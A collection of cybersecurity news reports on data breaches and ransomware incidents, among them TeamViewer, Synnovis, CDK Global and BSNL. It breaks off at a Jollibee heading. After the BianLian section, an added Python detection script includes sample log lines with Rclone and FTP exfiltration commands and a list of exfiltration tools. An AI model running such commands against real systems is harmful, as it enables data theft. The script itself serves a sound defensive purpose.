Indonesia’s Civil Aviation Data Breached? Hacker Claims Access to Employees, Flight Data
Decoding Indonesian Civil Aviation Data Breach
The threat actor’s post on the hacking site BreachForums stated that the exfiltration of data occurred on June 27, 2024. In his post, the hacker stated, “The Directorate General of Civil Aviation (DGCA) is an element that implements some of the duties and functions of the Indonesian Ministry of Transportation, which is under and responsible to the Minister of Transportation. The Directorate General of Civil Aviation is led by the Director General. The Directorate General of Civil Aviation has the task of formulating and implementing policies and technical standardization in the field of air transportation. The Directorate General of Civil Aviation handles the administration and management of civil aviation within the Unitary State of the Republic of Indonesia.” To substantiate the data breach claim, the threat actor attached the following sample records.
- User log for small, unmanned aircraft certificates, remote pilot certificate and unmanned aircraft operation approval.
- Sample chats that probably refer to communications between DGCA employees and pilots on 04/13/2022
- ID card photo data for all employees
- Username and password of employees who logged on to a DGCA application
Indonesia Battles Three Major Cyberattack Claims in One Week
Hackers have allegedly carried out three major cyberattacks on key Indonesian establishments in recent days. Last week, a ransomware attack on Indonesia’s national data center disrupted official government services, including immigration services at airports. The attack has reportedly affected more than 200 government agencies at national and regional levels. The attack was carried out with LockBit 3.0 ransomware, a variant known for encrypting victims’ data and demanding payment for its release. The attackers had offered a decryption key in exchange for an $8 million ransom. AFP reported that the Indonesian government refused to pay the ransom but admitted that the cyberattack would have been rendered useless had there been a backup of the main server. Earlier this week, a hacker “MoonzHaxor” claimed to have breached the Indonesian Military's (TNI) Strategic Intelligence Agency (Bais) and offered to sell this data for $1,000. The same hacker had announced breaching Indonesia's Automatic Finger Identification System (Inafis) owned by the National Police (Polri). The data reportedly includes fingerprint images, email addresses, and Spring Boot application configurations.
Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
Geisinger Healthcare Data Breach: Former Employee Exposes Over One Million Patient Records
Geisinger Data Breach Links to Former Employee
The Geisinger data breach was first identified in November 2023, when the organization detected unauthorized access to its patient database by a former Nuance employee shortly after their termination. Geisinger promptly notified Nuance, which took immediate steps to sever the employee's access to their systems containing patient records. According to Geisinger's Chief Privacy Officer, Jonathan Friesen, "Our patients' and members' privacy is a top priority, and we take protecting it very seriously." Nuance, in collaboration with law enforcement authorities, launched an investigation resulting in the arrest of the former employee, who now faces federal charges. The investigation revealed that the compromised information included patient names along with various details such as date of birth, addresses, medical record numbers, and contact information. Importantly, sensitive financial information such as credit card numbers or Social Security numbers remained unaffected.
Geisinger Has Notified Customers About the Data Leak
Geisinger has taken proactive measures to notify affected patients and has provided a dedicated helpline (855-575-8722) for assistance. Patients are advised to review any communications from their health insurer and report any discrepancies promptly. "This incident underscores the critical importance of robust data security measures within healthcare systems, especially when handling sensitive patient information," said Friesen. Geisinger continues to cooperate closely with authorities as the investigation progresses, aiming to mitigate any further risks to patient privacy and security. Geisinger urges recipients of the notification to carefully review the details provided and reach out with any questions or concerns. The organization has shared customer service numbers that affected individuals can call Monday through Friday, Eastern Time, excluding major U.S. holidays, quoting engagement number B124651. In light of the breach, Geisinger emphasizes its commitment to transparency and patient care, ensuring affected individuals receive the support and resources necessary to safeguard their personal information and mitigate potential risks associated with the Geisinger data leak.
TeamViewer Attributes Corporate Network Breach to APT29 aka Midnight Blizzard
"Current findings of the investigation point to an attack on Wednesday, June 26, tied to credentials of a standard employee account within our Corporate IT environment. Together with our external incident response support, we currently attribute this activity to the threat actor known as APT29 / Midnight Blizzard. Based on current findings of the investigation, the attack was contained within the Corporate IT environment and there is no evidence that the threat actor gained access to our product environment or customer data." - TeamViewer
The company, which provides enterprise remote-access solutions, reassured its customers that it follows best practices in its overall system architecture and has therefore segmented its Corporate IT, its production environment, and the TeamViewer connectivity platform.
"This means we keep all servers, networks, and accounts strictly separate to help prevent unauthorized access and lateral movement between the different environments. This segregation is one of multiple layers of protection in our ‘defense in-depth’ approach." - TeamViewer
Despite ongoing investigations, the company remains focused on safeguarding system integrity and ensuring transparency in its communication regarding the incident.
TeamViewer Data Breach Confirmed
The TeamViewer data breach was highlighted by cybersecurity firm NCC Group, which was alerted about the compromise of TeamViewer's remote access and support platform by an APT group. This group, identified as APT29, aka Midnight Blizzard or Cozy Bear, is known for its cyberespionage capabilities and has previously been linked to cyberattacks targeting various global entities, including Western diplomats and technology firms. “On Wednesday, 26 June 2024, our security team detected an irregularity in TeamViewer’s internal corporate IT environment. We immediately activated our response team and procedures, started investigations together with a team of globally renowned cyber security experts, and implemented necessary remediation measures,” reads the official statement. Coinciding with TeamViewer's disclosure, alerts from the Dutch Digital Trust Center and Health-ISAC highlighted the severity of the situation. The Health-ISAC alert specifically warned of active exploitation of TeamViewer by APT29, advising organizations to monitor remote desktop traffic for any suspicious activity.
Mitigation Against the TeamViewer Data Leak
TeamViewer, widely adopted with thousands of customers globally and installed on billions of devices, continues to update stakeholders through its IT security update page. However, concerns have been raised about its transparency practices, as the page currently includes a directive preventing indexing by search engines. “There is no evidence to suggest that the product environment or customer data is affected. Investigations are ongoing and our primary focus remains to ensure the integrity of our systems. Security is of utmost importance for us, it is deeply rooted in our DNA. Therefore, we value transparent communication and will continuously update the status of our investigations as new information becomes available,” concludes the statement. For users and organizations relying on remote access solutions like TeamViewer, vigilance and proactive monitoring are recommended to mitigate risks posed by sophisticated cyber adversaries. *Update (Friday, June 28 - 8:10 A.M. ET): The headline and text throughout the article were updated to reflect TeamViewer's Friday update and its attribution of the cyberattack to APT29 / Midnight Blizzard.
Data of 93,000 Volunteers of India’s NDMA Allegedly Put Up for Sale
Exploring Data Leak Claims of NDMA Volunteers
The NDMA was created in 2006. Its primary responsibility is to coordinate the response to natural or man-made disasters and to build capacity in disaster resiliency and crisis response. It is also the apex body for setting policies, plans and guidelines for disaster management to ensure a timely and effective response to disasters. The allegation that NDMA data had been hacked emerged on June 25 on the data leak site BreachForums. The threat actor “infamous” claimed to be in possession of a stolen database consisting of the Personally Identifiable Information (PII) of NDMA volunteers, including personal details such as name, title, gender, blood group, date of birth, email, mobile number, ID number, marital status, family contact number, education qualifications, skills, cadre, address, postal code, and current state of residence.
Source: X
To substantiate the data breach claim, the threat actor attached sample records with a latest timestamp of June 2024, while disclosing that the database includes records of 93,000 volunteers. The cyberattacker is asking $1,000 for the entire data set on BreachForums. Despite these claims by the threat actor, a closer inspection reveals that NDMA’s website is currently functioning normally, showing no signs of a security breach. The threat actor has also not provided clarity on the period during which the volunteers served. The Cyber Express has reached out to NDMA to verify the alleged cyberattack. As of now, no official statements or responses have been received, leaving the claims unverified.
NDMA Volunteers Must Stay Vigilant
While authorities investigate the data breach claim, NDMA volunteers must be vigilant and take steps to prevent any malicious activity. Cybercriminals usually employ a range of tactics to misuse personal information, perpetrating identity theft and financial fraud. Some prominent techniques include phishing, where hackers trick individuals into revealing their PII by mimicking legitimate entities through fraudulent emails or phone calls. Individuals are also susceptible to identity theft and fraud, where fraudsters use psychological tactics to get victims to divulge sensitive information, such as passwords or credit card details. Since the email addresses have also allegedly been leaked, individuals must be vigilant about suspicious messages requesting sensitive information, as well as any unusual activity involving new or existing accounts.
Hackers Target 373 Indian Govt Websites in Five Years: Report
According to data published by the Indian Government, hackers have repeatedly targeted key websites run by the administration. An article in The Hindustan Times, quoting data from the Ministry of Electronics and Information Technology, said that, “As per the information reported to and tracked by CERT-In (Indian Computer Emergency Response Team), a total number of 110, 54, 59, 42, 50 and 58 website hacking incidents of Central Ministries/Departments and State Government organizations were observed during the years 2018, 2019, 2020, 2021, 2022 and 2023 (up to September).” The report added that some government offices were still using outdated Windows versions on their official computers and laptops, making them vulnerable to cyber threats.
Evolve Bank Confirms Data Breach, Customer Information Exposed
Details of the Evolve Bank Data Breach
There were reports that the Russian hacker group LockBit was responsible for the ransomware attack and data breach at Evolve Bank. LockBit had claimed to possess Federal Reserve data and, when their demands were not met, released approximately 33 terabytes of data from Evolve's systems. The group had allegedly touted their cache of Federal Reserve data, which was used to pressure the bank into meeting their demands. In response to the reports surfacing about the Evolve data breach, Evolve Bank & Trust is actively informing affected individuals about the breach. The bank has started reaching out to impacted customers and financial technology partners' customers through emails sent from notifications@getevolved.com. The communication includes detailed instructions on how to enroll in complimentary credit monitoring and identity theft detection services.
Steps Taken by Evolve Bank & Trust
The bank is undertaking a comprehensive response to this incident, which includes:
- Engagement with Law Enforcement: Evolve has involved appropriate law enforcement authorities to aid in the investigation and response efforts.
- Customer Communication: Direct communication with affected customers and financial technology partners' customers is ongoing to ensure they are informed and can take necessary protective measures.
- Credit Monitoring Services: Impacted individuals are being offered complimentary credit monitoring and identity theft detection services.
- Continuous Monitoring: Evolve is closely monitoring the situation and will provide updates as necessary to keep customers informed.
Recommendations for Affected Customers
Evolve Bank & Trust advises all retail banking customers and financial technology partners' customers to remain vigilant by:
- Monitoring Account Activity: Regularly check bank accounts and report any suspicious activity immediately.
- Credit Report Checks: Set up free fraud alerts with nationwide credit bureaus—Equifax, Experian, and TransUnion. Customers can also request and review their free credit report through Freecreditreport.com.
- Reporting Suspicious Activity: Contact the bank immediately if any fraudulent or suspicious activity is detected. Additionally, individuals can file a report with the Federal Trade Commission (FTC) or law enforcement authorities if they suspect identity theft or fraud.
Credit Suisse Data Breach Allegedly Exposes Info of 19,000 Indian Employees
Credit Suisse Data Breach Details
Credit Suisse was founded in 1856 and has approximately $15.21 Billion in revenue. It is one of the leading institutions in private banking and asset management, with strong expertise in investment banking. On June 25, 2024, the threat actor claimed to have carried out a cyberattack on the bank and exfiltrated details on 19,000 of its users.
Source: X
The breached data purportedly includes names of employees, 6,623 unique email addresses, their codes, date of birth, gender, policy name, relationships, dates of joining, effective dates, statuses, and entities. To substantiate the claim, the threat actor 888 provided a sample of the data breach, which contains details of Credit Suisse employees in India.
Source: X
The TA, however, did not provide a specific price for the sale of the data and asked potential buyers to quote a figure. The hacker commented that they only accept cryptocurrency as the mode of payment. More specifically, the hacker was open to payment in Monero (XMR), a digital currency renowned for its privacy and anonymity attributes. This method of payment is often utilized in illegal transactions to evade detection. Despite these claims by the threat actor, a closer inspection reveals that the bank’s website is currently functioning normally, showing no signs of a security breach. The Cyber Express has reached out to the bank to verify the alleged cyberattack. As of now, no official statements or responses have been received, leaving the claims unverified.
Not the First Credit Suisse Data Breach
This is not the first time that Credit Suisse has been involved in a security breach. According to a report published in The Economic Times, in 2023 the bank warned its staff that a former employee had stolen personal data of its employees, including salaries and bonuses. The information included salary and "variable compensation" for the period between 2013 and 2015. Another Bloomberg report said that a data breach in 2023 impacted numerous former Credit Suisse clients who collectively held a staggering $100 billion in accounts.
Credit Suisse Hacker Targeted Big Multinationals Recently
There are many concerns over the potential misuse of sensitive information found in the data breach, which includes customer names, dates of birth, and relationships. Credit Suisse should investigate the data breach claims considering the history of the threat actor. Earlier this month, the TA 888 claimed to have stolen data of over 32,000 current and former employees of Accenture. The company, however, denied the claims and said that the data set published by the hacker contained only three employee names and email addresses. The hacker also claimed responsibility for leaking details about 8,174 employees of Heineken across several countries. Prior to this, 888 also claimed responsibility for an attack on oil and gas multinational Shell. The TA posted sample information sharing personal details of Australian customers.
BianLian Ransomware Targets Better Business Bureau, US Dermatology Partners
BianLian Ransomware Attack: Critical Details
The first organization targeted by hackers was Better Business Bureau (BBB), which is a private, nonprofit organization founded in 1912 in Arlington, Virginia. The firm maintains a massive database of accredited and non-accredited businesses, providing ratings based on several factors. The Better Business Bureau has a revenue of $430.6 Million.
Source: X
The threat actor claims to have accessed 1.2 TB of organization data, including accounting, budget, and financial data; contract data and NDAs; files from the CFO's computer; operational and business files; and email and PST archives. The group has also disclosed sensitive information such as the names, personal email addresses, and phone numbers of BBB’s CEO, vice president, chief accreditation officer, and chief activation officer. The other organization that has allegedly fallen victim to the ransomware group is US Dermatology Partners. The organization, with a revenue of $213.7 Million, is one of the premier dermatology practitioners in the USA, caring for over two million patients annually.
Source: X
The hackers claimed to have accessed 300 GB of organization data, including personal data, accounting and budget information, financial data, contract data and NDAs, and employee profiles.
Potential Impact of BianLian Ransomware Attack
If proven, the consequences of this ransomware attack could be critical, as the accounting and financial details of both firms could be leaked. The organizations should take appropriate measures to protect the privacy and security of the stakeholders involved. Financial data breaches can lead to identity theft, financial fraud, and a loss of trust among clients, potentially jeopardizing the company’s standing in the industry. Currently, details regarding the extent of the BianLian ransomware attack, the data compromised, and the motive behind the cyber assault remain undisclosed. Despite the claims made by BianLian, the official websites of the targeted companies remain fully functional. This discrepancy has raised doubts about the authenticity of the BianLian group’s assertion. To ascertain the veracity of the claims, The Cyber Express has reached out to the officials of the affected organizations. As of the writing of this news report, no response has been received, leaving the ransomware attack claim unverified.
History of BianLian Ransomware Group Attacks
BianLian, a ransomware group, has been targeting critical infrastructure sectors in the U.S. and Australia since June 2022. The group exploits RDP credentials, uses open-source tools for discovery, and exfiltrates data via FTP or Rclone. The FBI, CISA, and ACSC advise implementing mitigation strategies to prevent ransomware attacks. Initially employing a double-extortion model, the group shifted to exfiltration-based extortion by 2023. According to a report by BlackBerry, BianLian ransomware showcases exceptional encryption speed and is coded in the Go programming language (Golang). This sophisticated approach has enabled the group to strike multiple organizations, leaving a trail of unverified claims in its wake. Earlier in 2024, the group targeted companies such as North Star Tax and Accounting, KC Pharmaceuticals, and Martinaire. In its attack on MOOver, the group claimed to have accessed a staggering 1.1 terabytes of the firm’s data. Subsequently, Northeast Spine and Sports Medicine also found themselves on the list of victims. All these claims, like the recent attack, remain unverified.
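The BianLian summary above (RDP access with stolen credentials, then exfiltration over FTP or Rclone) and the Health-ISAC advice in the TeamViewer piece (monitor remote desktop traffic) both come down to the same defender question: what in the logs would show it? The script below is an added illustration, not code from The Cyber Express, the FBI/CISA/ACSC advisory, or BlackBerry's report. It runs three simple rules over constructed sample log lines: an RDP logon from outside the corporate address ranges, execution of an Rclone or FTP client binary wherever it was dropped, and a single large outbound flow to an external host, and then flags users who trip both the access rule and an exfiltration rule. The key=value log format, the field names, the RFC 1918 "internal" ranges and the 500 MiB threshold are all assumptions made for the example.

```python
"""
Added illustration of detection logic for the tradecraft summarised above:
RDP access with valid credentials, then data exfiltration over FTP or Rclone.
The log format, field names and thresholds are assumptions, not any product's schema.
"""
import ipaddress
import re
from collections import defaultdict

# Constructed sample endpoint/network logs in a simple key=value format (assumption).
# logon_type=10 is the Windows "RemoteInteractive" (RDP) logon type; bytes_out is in bytes.
SAMPLE_LOGS = r"""
ts=2024-06-25T01:02:03Z host=FS01 event=logon user=jdoe logon_type=10 src_ip=10.20.0.15
ts=2024-06-25T01:05:10Z host=FS01 event=logon user=svc_backup logon_type=10 src_ip=203.0.113.77
ts=2024-06-25T01:06:44Z host=FS01 event=process user=svc_backup image="C:\Temp\rclone.exe" cmdline="rclone.exe copy D:\Finance remote:drop --transfers 32"
ts=2024-06-25T01:07:02Z host=FS01 event=process user=svc_backup image="C:\Windows\System32\ftp.exe" cmdline="ftp.exe -s:C:\Temp\cmds.txt 198.51.100.9"
ts=2024-06-25T01:09:30Z host=FS01 event=netflow user=svc_backup dst_ip=198.51.100.9 dst_port=21 bytes_out=734003200
ts=2024-06-25T01:10:00Z host=WS07 event=process user=jdoe image="C:\Program Files\Mozilla Firefox\firefox.exe" cmdline="firefox.exe"
ts=2024-06-25T01:11:00Z host=WS07 event=netflow user=jdoe dst_ip=10.20.0.5 dst_port=445 bytes_out=52428800
"""

# RFC 1918 ranges stand in for "the corporate network" (assumption for this example).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Executable names taken from the advisory summary above; a real rule set would be broader.
EXFIL_TOOLS = {"rclone.exe", "rclone", "ftp.exe"}
# Single-flow egress volume that warrants a look (assumed threshold: 500 MiB).
EGRESS_BYTES_THRESHOLD = 500 * 1024 * 1024

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_line(line):
    """Parse one key=value log line into a dict; quoted values may contain spaces."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


def is_internal(ip):
    """True when the address falls inside one of the assumed corporate ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def detect(log_text):
    """Return (rule, user, detail) tuples for each log line that trips a rule."""
    findings = []
    for line in log_text.strip().splitlines():
        rec = parse_line(line)
        event = rec.get("event")
        if event == "logon" and rec.get("logon_type") == "10" and not is_internal(rec["src_ip"]):
            # RDP logon from outside the corporate ranges: valid credentials, wrong place.
            findings.append(("external_rdp_logon", rec["user"], rec["src_ip"]))
        elif event == "process":
            # Compare the executable's basename so the rule holds wherever the tool was dropped.
            basename = rec.get("image", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
            if basename in EXFIL_TOOLS:
                findings.append(("exfil_tool_exec", rec["user"], basename))
        elif event == "netflow":
            # One large flow to a non-corporate destination is the exfiltration signal itself.
            if not is_internal(rec["dst_ip"]) and int(rec["bytes_out"]) >= EGRESS_BYTES_THRESHOLD:
                findings.append(("large_external_egress", rec["user"], rec["dst_ip"]))
    return findings


def correlate(findings):
    """Users with an external RDP logon plus an exfiltration indicator: escalate these first."""
    kinds_by_user = defaultdict(set)
    for rule, user, _ in findings:
        kinds_by_user[user].add(rule)
    return sorted(user for user, kinds in kinds_by_user.items()
                  if "external_rdp_logon" in kinds
                  and kinds & {"exfil_tool_exec", "large_external_egress"})


if __name__ == "__main__":
    hits = detect(SAMPLE_LOGS)
    for hit in hits:
        print(hit)
    print("escalate:", correlate(hits))
```

On the constructed sample, the `svc_backup` account trips all three rules (external RDP logon, rclone.exe and ftp.exe execution, and a 700 MB flow to the FTP destination) and is the only user `correlate` escalates; `jdoe`'s internal RDP session and SMB traffic produce nothing. In practice the process rule should also match on command-line content and file hashes, since a renamed binary defeats a basename check, and the egress rule is better expressed per user and per day than per flow.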
BSNL Data Breached Yet Again? Millions of Users Face Risk of SIM Card Cloning, Financial Fraud
Exploring Claims of BSNL Data Breach
The BSNL data leak was first disclosed by an Indian firm, Athenian Tech, in its threat intelligence report. According to the report, a threat actor operating under the alias “kiberphant0m” leaked a significant amount of sensitive data affecting millions of users. The threat actor posted this information on the data hack site BreachForums and shared samples of the breach to legitimize the claim. Overall, around 278 GB of sensitive information could be compromised. The hacker also posted call log samples which leaked sensitive information such as users' mobile numbers, the date and duration of calls, and the amount charged for each call in Indian Rupees. The call log samples were leaked in two sets: one for the month of May 2024 and another from 2020. This indicates that the data breach was a recent attack, raising questions over the security checks in place at BSNL. The threat actor was selling the alleged stolen data for $5,000. The steep price tag could indicate the value of the sensitive stolen data. The Cyber Express has yet to verify the authenticity of the recent BSNL data breach and has contacted the organization for an official response. This article will be updated based on their response.
Potential Implications of BSNL Data Breach
- SIM Cloning and Identity Theft: Cloning a SIM involves creating a duplicate card that has the same IMSI and authentication keys, making it easy for attackers to intercept messages and calls, gain access to people’s bank accounts, and embezzle their finances.
- Privacy Violations: With a cloned identity, an attacker gains unauthorized access to the individual’s communications and accounts.
- Financial and Identity Theft: Attackers can bypass the safeguards on financial accounts, leading to substantial monetary losses and cases of identity theft.
- Targeted Attacks and Scams: Users could be exposed to major security risks and could be vulnerable to phishing schemes and other social engineering attacks that exploit their trust in BSNL.
Second BSNL Data Breach in Less Than Six Months
If the data theft claims are proven, it would be the second instance of a cyberattack on BSNL in less than six months. In December 2023, a threat actor known as “Perell” claimed access to critical information about fiber and landline users of BSNL. The dataset contained about 32,000 lines of data allegedly impacting over 2.9 million users. However, BSNL did not validate the claims back then.
Neiman Marcus Alerts Customers After Data Breach Exposes Information of 64,472 Individuals
Neiman Marcus Data Breach Confirmed
The Neiman Marcus data breach compromised a range of personal data, including customer names, contact details, dates of birth, and Neiman Marcus gift card numbers. "Based on our investigation, the unauthorized party obtained certain personal information stored in the platform," the spokesperson continued, clarifying that "The types of personal information affected varied by individual, and included information such as name, contact information, date of birth, and Neiman Marcus or Bergdorf Goodman gift card numbers (but without gift card PINs)." Neiman Marcus has acted swiftly, launching an investigation with leading cybersecurity experts and notifying law enforcement authorities. In compliance with regulatory requirements, the company has begun notifying affected customers, including reaching out to the Maine Attorney General's office. The retailer has advised customers to monitor their financial statements for any suspicious activity and has provided resources for individuals concerned about identity theft.
Mitigation Against the Neiman Marcus Data Leak
"We also began an investigation with assistance from leading cybersecurity experts and notified law enforcement authorities," the spokesperson emphasized. Customers are encouraged to request free credit reports, report any suspected fraud to law enforcement and the Federal Trade Commission, and consider placing a security freeze on their credit files as precautionary measures. Neiman Marcus Group, Inc., based in Dallas, Texas, is a popular luxury retailer that oversees brands such as Neiman Marcus, Bergdorf Goodman, Horchow, and Last Call. Since September 2021, it has been under the ownership of a consortium of investment firms led by Davidson Kempner Capital Management, Sixth Street Partners, and Pacific Investment Management. Following this Neiman Marcus data leak, the firm has established a dedicated toll-free hotline (1-885-889-2743) for affected customers seeking further information or assistance related to the data breach incident.
CISA: Hackers Breached Chemical Facilities’ Data in January
Potential Data Compromised in Chemical Facilities' Targeting
CISA's investigation found no direct evidence of data exfiltration but indicated that the hackers might have accessed critical information such as site security plans, security vulnerability assessments (SVAs), and user accounts within CSAT. Additionally, "Top-Screen surveys," which detail the types and quantities of chemicals, their properties, and storage methods at facilities, might have been exposed. High-risk chemical facilities are mandated to submit SVAs outlining their critical assets, cyber and physical security policies, and an analysis of potential vulnerabilities. Other compromised documents could include details on cybersecurity measures, alarms and physical barriers in place at these facilities.
CISA's Response and Recommendations
CISA has informed participants in the Chemical Facility Anti-Terrorism Standards (CFATS) program about the potential data exposure. Although no credentials were confirmed to be stolen, CISA advises those with CSAT accounts to reset any identical business or personal passwords. It also recommends that organizations using Ivanti products review a February advisory about recent vulnerabilities. The agency cannot directly notify individuals submitted for terrorist vetting under the CFATS Personnel Surety Program because it did not collect their contact information. However, identity protection services will be offered to those affected, specifically those vetted between December 2015 and July 2023.
Investigation Findings
The breach was detected on January 26, when CISA discovered hackers installing tools on an Ivanti device. Further investigation revealed multiple accesses to the system over two days. Various departments within CISA and the Department of Homeland Security (DHS) were involved in the investigation, which confirmed no hacker access beyond the initial Ivanti device. Despite the absence of evidence for data exfiltration, the potential risk to numerous individuals and organizations categorized this intrusion as a "major incident" under the Federal Information Security Modernization Act (FISMA). CISA is setting up a call center to assist impacted individuals, although it is not yet operational. The agency did not comment on the perpetrators of the attack, but since 2020 CISA has cautioned organizations about state-sponsored hackers, including those linked to China, exploiting vulnerabilities in Ivanti products.
Experts Say More Transparency Required
Roger Grimes, a data-driven defense evangelist at KnowBe4, lauded CISA's intent and the fact that it publicly accepted the hack but said a bit more transparency would have done no harm.
"I'm a big fan of CISA. I think they do wonderful work. Still, it would be useful to have better, full transparency," Grimes told The Cyber Express. "Was their Ivanti device exploited by an unpatched, but known vulnerability, or exploited by a 0-day? If they were exploited by a known vulnerability where a patch was available, which is more likely, why wasn't the patch installed? Was it simply due to the fact that the exploit happened faster than the patch could be applied? Was the patch missed? If the patch was missed, why? Or was it a 0-day, misconfiguration, or credential compromise?"
"This is not to embarrass CISA, but to learn why one of the best, most aggressive patch-pushing, cyber-defending organizations in the world got compromised," Grimes added. "Sharing what happened and why can help other organizations facing similar problems and challenges learn lessons.
"CISA is always pushing for other industries and vendors to be more transparent about their compromises so that we can all learn from the lessons and mistakes. I expect CISA to do the same and even lead by example when it's their infrastructure involved."
Synnovis Confirms Data Published by Qilin Ransomware Gang as Legitimate
“Last week a group claiming responsibility for the cyberattack published data online. We have now been able to confirm that this data was stolen from Synnovis’ systems.” - Synnovis
An initial review from Synnovis over the weekend revealed no evidence that the Laboratory Information Management Systems (LIMS) - the primary databases for patient test requests and results - were posted. However, fragments of patient-identifiable data from an administrative working drive have been published, Synnovis said. The payroll information storage area remains unaffected, but further review of employee-related data that appeared in the dataset published on the dark web is underway. Synnovis emphasized the priority of understanding the compromised administrative working drive. The company is working alongside technical experts to ascertain more details and mitigate concerns among service users, employees and partners.
The Information Commissioner’s Office (ICO) is investigating the breach, acknowledging the sensitivity of the leaked data and the anxiety it may cause. “While we are continuing to make enquiries into this matter, we recognize the sensitivity of some of the information in question and the worry this may have caused,” the ICO said. The ICO advises concerned individuals to visit its website and NHS England’s site for guidance and support.
NHS England continues collaborating with Synnovis and the National Crime Agency to address the ransomware attack. NHS England acknowledged Synnovis’ initial analysis that confirmed the published data originated from their systems. The complex nature of such investigations means it could take weeks to identify all impacted individuals, it said. As the investigation proceeds, NHS England and Synnovis will provide updates and have established a helpline for those affected. Local health systems are working together to manage the impact on patients and have deployed additional resources to ensure urgent blood samples are processed.
Laboratories can now also access historical patient records, which aids continuity of care, NHS England said. The cyberattack has significantly delayed blood tests, with some media reports stating NHS patients could potentially wait up to six months for sample collection. Earlier, Synnovis said the ransomware attack had significantly brought down the daily blood sampling count in major London hospitals from 10,000 to merely 400 per day. The Guardian cited a letter from the impacted hospital in which one patient was told:
“Sadly it appears it may be three to six months before bloods can be taken again. You will be put on a waiting list and our secretaries will contact you when bloods can be taken again. If you haven’t heard anything in the next four months please feel free to contact us on the details above. I want to apologise for this inconvenience and appreciate this will be frustrating.”
The pathology service provider was processing only “clinically critical” blood samples flagged by clinicians. These delays have prompted some patients to seek private clinics for faster testing and analysis at significantly higher cost. The impact of the Synnovis ransomware attack is also felt by NHS Blood and Transplant (NHSBT), which appealed to the public earlier this month to urgently donate O blood-type (+ve and -ve) across England. The attack caused significant disruption to the hospitals’ ability to match patients’ blood types, leading to an increased demand for O-positive and O-negative blood donations, which are medically considered safe for all patients.
CDK Global Cyberattack Ripple Effect: Several Car Dealers Report Disruptions
Systems Shut Down After Attack
CDK Global, a crucial provider of SaaS platforms for dealerships, was forced last week to shut down its systems in response to the cyberattack. "With the work done so far, our core DMS and Digital Retailing solutions have been restored," a spokesperson for CDK Global told The Cyber Express at the time. "We are currently investigating a cyber incident. Erring on the side of caution, we proactively shut all systems down and executed extensive testing." This shutdown has hindered dealerships' abilities to manage customer relationships, sales, financing, service, inventory, and back-office operations. CDK Global's systems are vital to over 15,000 car dealerships in North America. The company facilitates various operations, including car sales, repairs and registrations. There are only a handful of DMS companies for dealers to choose from. Thus, thousands of dealerships are hugely reliant on CDK’s services to line up financing and insurance, manage inventory of vehicles and parts, and complete sales and repairs.
How CDK Global Cyberattack Impacts Customers
Asbury, AutoNation, Lithia Motors, Sonic Automotive, and Group 1 Automotive have activated their incident response plans and disconnected from CDK systems as a precaution, although no evidence of compromise within their own networks was found. Sonic Automotive mentioned that as of Friday, the extent to which the attackers accessed customer data remains unknown. Lithia Motors highlighted the ongoing negative impact on its operations, indicating uncertainty over whether the incident will materially affect its financial condition. Group 1 Automotive noted that CDK aims to restore the dealer management system within "several days and not weeks," but the financial impact depends on the system's downtime duration. Group 1 owns and operates 202 automotive dealerships, 264 franchises, and 42 collision centers in the United States and the United Kingdom that offer 35 brands of automobiles.
CDK Customers Move to Manual Methods
Penske Automotive reported that the ransomware attack primarily affected its Premier Truck Group, which sells heavy- and medium-duty trucks across 48 locations in the U.S. and Canada. The company has implemented business continuity plans and continues operations using manual and alternate processes designed for such incidents. Penske noted that the truck dealership business, which serves business customers, has lower unit volumes compared to automotive dealerships. Asbury said business operations are functioning but "slower than normal." It added that the dealerships at Koons Automotive locations in Maryland and Virginia do not use CDK’s Dealer Management System or CDK’s Customer Relationship Management system and therefore continue to operate with minimal interruption, as does Clicklane, their online vehicle purchasing platform. Asbury operates 157 new vehicle dealerships, which include 206 franchises representing 31 domestic and foreign vehicle brands.
CDK May Pay Ransom
Late on Friday, Bloomberg reported that CDK Global is negotiating with a ransomware gang, which Bleeping later confirmed to be BlackSuit, a rebrand of the Royal ransomware group known for last year's attack on the city government of Dallas. Although the ransom amount remains undisclosed, CDK Global reportedly plans to pay, Bloomberg said. CDK Global has issued prerecorded messages to warn customers about hackers posing as CDK staff to gain unauthorized access. Despite making recovery progress last week, CDK faced a second cyber incident that led to a complete shutdown of its systems. The company is working with third-party experts to assess the impact and update its customers regularly. This attack exposes the critical vulnerabilities in the supply chain of the automotive industry and its reliance on centralized digital platforms.
Crypto Investors Alarmed as Coinstats Breach Impacts 1,590 Wallets
Understanding the Coinstats Data Breach
Source: Coinstats on X
In a public statement addressing the breach, Coinstats reassured its user base that the incident has been mitigated, and immediate steps have been taken to secure the platform. Users whose wallet addresses were compromised were advised to take action by transferring their funds using exported private keys. A spreadsheet link was provided for users to check if their wallets were among those affected. CEO Narek Gevorgyan highlighted the seriousness of the situation, acknowledging the challenges posed by the Coinstats cyberattack while emphasizing Coinstats' commitment to restoring normal operations swiftly and securely. Gevorgyan outlined that comprehensive security measures were being implemented during the restoration process to fortify the platform against future vulnerabilities. "We're actively working to bring the app back online as quickly as possible. Thank you for your patience," stated Gevorgyan in an update shared via Coinstats' official channels.
North Korea-linked Hackers Behind the Data Breach at Coinstats
The revelation of North Korea-linked hackers being behind the breach adds a geopolitical dimension to the Coinstats data breach incident, highlighting the global reach and sophisticated tactics employed by cyber threat actors targeting digital assets and platforms. This aspect of the breach highlights the need for heightened cybersecurity measures across the cryptocurrency sector. In a similar case, another crypto firm, BtcTurk, faced a cyberattack on its hot wallets on June 22, 2024. Binance CEO Richard Teng confirmed this attack, pledging ongoing support for BtcTurk's investigation. Cryptocurrency investigator ZachXBT hinted at a possible link between the breach and a $54 million Avalanche transfer. Coinstats users have been urged to remain vigilant and monitor their accounts closely for any unauthorized transactions or suspicious activities. The company assured its users that it is actively investigating the extent of funds moved during the breach and pledged to provide updates as new information becomes available. In response to the breach, regulatory bodies and industry stakeholders may scrutinize Coinstats' security practices and response protocols. The outcome of such scrutiny could influence future cybersecurity standards within the cryptocurrency industry, potentially leading to more stringent requirements for platform security and user protection.
Jollibee Probes Alleged Data Breach Affecting 32 Million Customers, Asks Public to Remain Vigilant
Details of Jollibee Probe into Cyberattack
